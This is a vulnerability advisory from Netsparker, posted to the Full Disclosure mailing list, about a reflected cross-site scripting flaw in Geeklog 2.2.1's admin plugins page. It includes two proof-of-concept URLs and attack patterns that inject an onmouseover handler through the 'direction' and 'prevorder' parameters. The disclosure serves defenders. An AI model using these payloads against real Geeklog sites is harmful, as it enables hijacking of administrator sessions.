Hello, We are informing you about a Cross-Site Scripting Vulnerability in Geeklog 2.2.1.
Here are the details: Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerability in Geeklog Affected Software: Geeklog Affected Versions: 2.2.1 Vendor Homepage: https://www.geeklog.net/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-001 Technical Details -------------------- URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x "%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load Parameter Name : direction Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22 URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x "%20onmouseover=netsparker(0x019E05)%20x=" Parameter Name : prevorder Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22 For more information: https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: dan...@netsparker.com <dan...@netsparker.com> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
